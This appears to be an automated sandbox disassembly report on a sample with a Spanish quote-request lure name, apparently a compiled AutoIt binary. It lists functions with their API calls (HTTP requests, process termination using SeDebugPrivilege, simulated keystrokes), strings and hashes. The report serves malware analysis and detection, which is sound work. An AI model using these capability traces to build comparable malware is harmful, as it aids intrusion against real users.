Instruction ID: 1e451bd44fb7aa55ada498cab69c517e7b40f9beab49d842aff8d4cf0cb82b46
Opcode Fuzzy Hash: 83f20df46797b22bfbbaa3fbf88c719c14abcf265be41951385316016fe204a3
Instruction Fuzzy Hash: 9111A7B6120118EFCB02EF54E842EDD7BA5FF05350F5154A5F9485F222DA31EE649F90

Function 00201410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00201459
OleUninitialize.OLE32(?,00000000), ref: 002014F8
UnregisterHotKey.USER32(?), ref: 002016DD
DestroyWindow.USER32(?), ref: 002424B9
FreeLibrary.KERNEL32(?), ref: 0024251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0024254B

Strings

close all, xrefs: 00201454

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 7f7a1f38113128427e00916dcb4d897a47a562d6755a56b9fdb8e631157f4989
Instruction ID: 0873fea78383b76c08d82c9a04c8ebfe87f2cae208ccb81571da52d66f6d00b2
Opcode Fuzzy Hash: 7f7a1f38113128427e00916dcb4d897a47a562d6755a56b9fdb8e631157f4989
Instruction Fuzzy Hash: FFD18D31721212CFDB19EF15C899B29F7A4BF05700FA5419DE84A6B2A2CB31AD76CF50

Function 00205BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00205C7A

Part of subcall function 00205D0A: GetClientRect.USER32(?,?), ref: 00205D30
Part of subcall function 00205D0A: GetWindowRect.USER32(?,?), ref: 00205D71
Part of subcall function 00205D0A: ScreenToClient.USER32(?,?), ref: 00205D99

GetDC.USER32 ref: 002446F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00244708
SelectObject.GDI32(00000000,00000000), ref: 00244716
SelectObject.GDI32(00000000,00000000), ref: 0024472B
ReleaseDC.USER32(?,00000000), ref: 00244733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 002447C4

Strings

U, xrefs: 00244693

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 7f9bc4322ad85c6f7cd7799226e8e94d41d1df53b76bc7c7d02c5b4ca0f52326
Instruction ID: 4194e1196402455f125b79d1d0ea31954de88c57752f929059e7351d50bcbd2c
Opcode Fuzzy Hash: 7f9bc4322ad85c6f7cd7799226e8e94d41d1df53b76bc7c7d02c5b4ca0f52326
Instruction Fuzzy Hash: F1710430420206DFDF29AF64C984BBA7BB5FF4A320F24426AED555A1A6C7309C62DF50

Function 0027359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002735E4

Part of subcall function 00209CB3: _wcslen.LIBCMT ref: 00209CBD

LoadStringW.USER32(002D2390,?,00000FFF,?), ref: 0027360A

Strings

Line %d (File "%s"):, xrefs: 0027366B
Error: , xrefs: 002736EF
"%s" (%d) : ==> %s:%s%s, xrefs: 00273724
"%s" (%d) : ==> %s:, xrefs: 00273742
^ ERROR, xrefs: 002736C9

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: d9083888fb9be08461423ea799562e6e2b296be2e479f06ecc479b029d385653
Instruction ID: 340d4d4c4d64299019939b4f6bd81c24addae6f883a9ea0aa6452700edef8638
Opcode Fuzzy Hash: d9083888fb9be08461423ea799562e6e2b296be2e479f06ecc479b029d385653
Instruction Fuzzy Hash: 9C516E71D2020ABADF14EBA0DC46EEEBB78AF04300F144165F105721A2EB315AF9DFA0

Function 0027C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0027C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0027C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0027C2CA
GetLastError.KERNEL32 ref: 0027C322
SetEvent.KERNEL32(?), ref: 0027C336
InternetCloseHandle.WININET(00000000), ref: 0027C341

Strings

, xrefs: 0027C2BB

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 09c4631b8312456807400e477f982b628fa82ae2af6f5aa51775b57948aa15f0
Instruction ID: 8511ed11a2c78bc7f7e4b701934e94af947f290a3ac6c08ff5eccc159ce3cdb6
Opcode Fuzzy Hash: 09c4631b8312456807400e477f982b628fa82ae2af6f5aa51775b57948aa15f0
Instruction Fuzzy Hash: B3317AB1620608AFD7219FB49C88AAB7BFCEB49744B20C51EF84A92201DB34DD149B61

Function 0026989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00243AAF,?,?,Bad directive syntax error,0029CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 002698BC
LoadStringW.USER32(00000000,?,00243AAF,?), ref: 002698C3

Part of subcall function 00209CB3: _wcslen.LIBCMT ref: 00209CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00269987

Strings

Line %d (File "%s"):, xrefs: 0026992D
Error: , xrefs: 00269955
., xrefs: 0026996D
%s (%d) : ==> %s.: %s %s, xrefs: 002698F1
Line %d:, xrefs: 00269912

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 749958d662eec63e95b198e34a9a520728f9c6ff1e76a4762f57a6e30f299d8f
Instruction ID: 054339f9f17b3ae2b931850cf0717b28d8b3fc0348c92088253e5c7276cf4503
Opcode Fuzzy Hash: 749958d662eec63e95b198e34a9a520728f9c6ff1e76a4762f57a6e30f299d8f
Instruction Fuzzy Hash: EE216D3182021AABCF25EF90CC4AEEE7779BF18704F04445AF515620A2EA7196B8DF50

Function 0026209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 002620AB
GetClassNameW.USER32(00000000,?,00000100), ref: 002620C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0026214D

Strings

SHELLDLL_DefView, xrefs: 002620CC
largeicons, xrefs: 002620E1
smallicons, xrefs: 00262115
list, xrefs: 0026212F
details, xrefs: 002620FB

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: ac7ebb06afc64fc932cb1a55bdefb7218ed53883b9fc1ec24f4d59af4fcc2805
Instruction ID: 3516b20bb19b858d56c7b596be31790fad81d0b5d8cd06b78c664a56065d4afd
Opcode Fuzzy Hash: ac7ebb06afc64fc932cb1a55bdefb7218ed53883b9fc1ec24f4d59af4fcc2805
Instruction Fuzzy Hash: 28113D761BCB17F5F6056620EC0AEA6379CCB16314B30015AFB08A40D2EEA1ACF55914

Function 0023CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0023CEB7
_free.LIBCMT ref: 0023CF22
_free.LIBCMT ref: 0023CF48
_free.LIBCMT ref: 0023CF71
_free.LIBCMT ref: 0023CFA9
_free.LIBCMT ref: 0023CFDA
_free.LIBCMT ref: 0023D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0023D09C
_free.LIBCMT ref: 0023D0B5

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 1a0bfced10a6790a9b63f1a8b8a0c470b176c7f6bfd8623559e67c61c66db56f
Instruction ID: f99b1b6b2554c905084ea2ae6035166cfd0e06a448d1aefb916ab53cd1ad115c
Opcode Fuzzy Hash: 1a0bfced10a6790a9b63f1a8b8a0c470b176c7f6bfd8623559e67c61c66db56f
Instruction Fuzzy Hash: 5A6178F1924312EFDB25AFB4A885B697BA5EF05710F24416FF800B7281D6329D21CB90

Function 00218B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00256890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 002568A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002568B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 002568D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002568F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00218874,00000000,00000000,00000000,000000FF,00000000), ref: 00256901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0025691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00218874,00000000,00000000,00000000,000000FF,00000000), ref: 0025692D

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 70d981a8f4ca0880564bf028cd59721386994c55fbdd1ca831d83e9481192ee7
Instruction ID: f39946b9b976e9c05e3f865951aabd0674d84feac7c48998ae5c9052a90e49c2
Opcode Fuzzy Hash: 70d981a8f4ca0880564bf028cd59721386994c55fbdd1ca831d83e9481192ee7
Instruction Fuzzy Hash: AD518C70A20206AFDB20CF24DC99BAA77F5EF64354F104519F906D72A0DB70EEA4DB50

Function 0027C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0027C182
GetLastError.KERNEL32 ref: 0027C195
SetEvent.KERNEL32(?), ref: 0027C1A9

Part of subcall function 0027C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0027C272
Part of subcall function 0027C253: GetLastError.KERNEL32 ref: 0027C322
Part of subcall function 0027C253: SetEvent.KERNEL32(?), ref: 0027C336
Part of subcall function 0027C253: InternetCloseHandle.WININET(00000000), ref: 0027C341

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: cedd59a60037792d68f66452d212f83af573bdcddc38143ce8c913f11d215196
Instruction ID: cab528fee6bd2e54987ca317091b5d75b896cfa01936946ba9ea9bc170a41ddc
Opcode Fuzzy Hash: cedd59a60037792d68f66452d212f83af573bdcddc38143ce8c913f11d215196
Instruction Fuzzy Hash: 0C318F71610601AFDB219FB5EC48A67BBF8FF58300B60842EF95E82611D730E9249F60

Function 002625A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00263A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00263A57
Part of subcall function 00263A3D: GetCurrentThreadId.KERNEL32 ref: 00263A5E
Part of subcall function 00263A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002625B3), ref: 00263A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 002625BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002625DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 002625DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 002625E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00262601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00262605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0026260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00262623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00262627

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: c25aeff79cd81b0caffcebf731bd101220db5349c798646d6b4b606b208e339e
Instruction ID: abe096c3d5676a025bb2dfccd11241b436393c182962d6074f92e10c5495aefb
Opcode Fuzzy Hash: c25aeff79cd81b0caffcebf731bd101220db5349c798646d6b4b606b208e339e
Instruction Fuzzy Hash: 2001B530690610BBFB106769DC8EF593E59DF4AB51F200012F318AE0D1C9E11454DA69

Function 00261803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00261449,?,?,00000000), ref: 0026180C
HeapAlloc.KERNEL32(00000000,?,00261449,?,?,00000000), ref: 00261813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00261449,?,?,00000000), ref: 00261828
GetCurrentProcess.KERNEL32(?,00000000,?,00261449,?,?,00000000), ref: 00261830
DuplicateHandle.KERNEL32(00000000,?,00261449,?,?,00000000), ref: 00261833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00261449,?,?,00000000), ref: 00261843
GetCurrentProcess.KERNEL32(00261449,00000000,?,00261449,?,?,00000000), ref: 0026184B
DuplicateHandle.KERNEL32(00000000,?,00261449,?,?,00000000), ref: 0026184E
CreateThread.KERNEL32(00000000,00000000,00261874,00000000,00000000,00000000), ref: 00261868

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 8b3d7f7523ad2fa593f3cf907a9b633de630007244ba9f06421004631769fb7b
Instruction ID: 95165ff2e12377315a7bd2ce340db0abf2bdcc5c793bf6214184fb7db20d1a56
Opcode Fuzzy Hash: 8b3d7f7523ad2fa593f3cf907a9b633de630007244ba9f06421004631769fb7b
Instruction Fuzzy Hash: 1001BF75240304BFE710AB65ED4DF5B3B6CEB89B11F504411FA05DB1A1C6709810CB34

Function 0028A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0026D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0026D501
Part of subcall function 0026D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0026D50F
Part of subcall function 0026D4DC: CloseHandle.KERNEL32(00000000), ref: 0026D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0028A16D
GetLastError.KERNEL32 ref: 0028A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0028A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0028A268
GetLastError.KERNEL32(00000000), ref: 0028A273
CloseHandle.KERNEL32(00000000), ref: 0028A2C4

Strings

SeDebugPrivilege, xrefs: 0028A18F

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: f660f6392e198069d4fa4391564ffa1a09460f4bd78b2ed2f241c0e4f89ee2d1
Instruction ID: 63a08e5707a6ce1488827adb728d6c7bfae3326312ae410798bf4b7d45c4d787
Opcode Fuzzy Hash: f660f6392e198069d4fa4391564ffa1a09460f4bd78b2ed2f241c0e4f89ee2d1
Instruction Fuzzy Hash: 2861A3742152429FE720EF18C498F15BBE1AF44318F14849DE45A4B7E3CB76EC55CB92

Function 00293886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00293925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0029393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00293954
_wcslen.LIBCMT ref: 00293999
SendMessageW.USER32(?,00001057,00000000,?), ref: 002939C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 002939F4

Strings

SysListView32, xrefs: 002938F7

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: cc669bf940d7ee94b14753056a4e4a5ee426e6c467528f0e9708fb88b2ec950c
Instruction ID: aa8ffd2f809e7ca2a8673a7212e12a4d757a7553384f6c48c8370e87466290ae
Opcode Fuzzy Hash: cc669bf940d7ee94b14753056a4e4a5ee426e6c467528f0e9708fb88b2ec950c
Instruction Fuzzy Hash: F4418671A10219ABEF21DF64CC49FEA77A9FF48350F10052AF958E7281D7719DA4CB90

Function 00222D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00222D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00222D53
_ValidateLocalCookies.LIBCMT ref: 00222DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00222E0C
_ValidateLocalCookies.LIBCMT ref: 00222E61

Strings

csm, xrefs: 00222DF6
&H", xrefs: 00222DFE, 00222E07, 00222E18

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: &H"$csm
API String ID: 1170836740-3377455284
Opcode ID: 8f37e769d6cf6c3f4cba72849423acdcfafc803c848c3b3c27650dd0ea3140b9
Instruction ID: 6461f5830f3acf12e13545faef51e69044e4f4e3fb583f77d27c958bf3ac7127
Opcode Fuzzy Hash: 8f37e769d6cf6c3f4cba72849423acdcfafc803c848c3b3c27650dd0ea3140b9
Instruction Fuzzy Hash: 6B41D634A20229FBCF10DFA8E844A9EBBA4BF45324F148155E8145B352D736AA29CF91

Function 0026C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0026C913

Strings

info, xrefs: 0026C8B4
warning, xrefs: 0026C8FC
blank, xrefs: 0026C895
question, xrefs: 0026C8CC
stop, xrefs: 0026C8E4

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
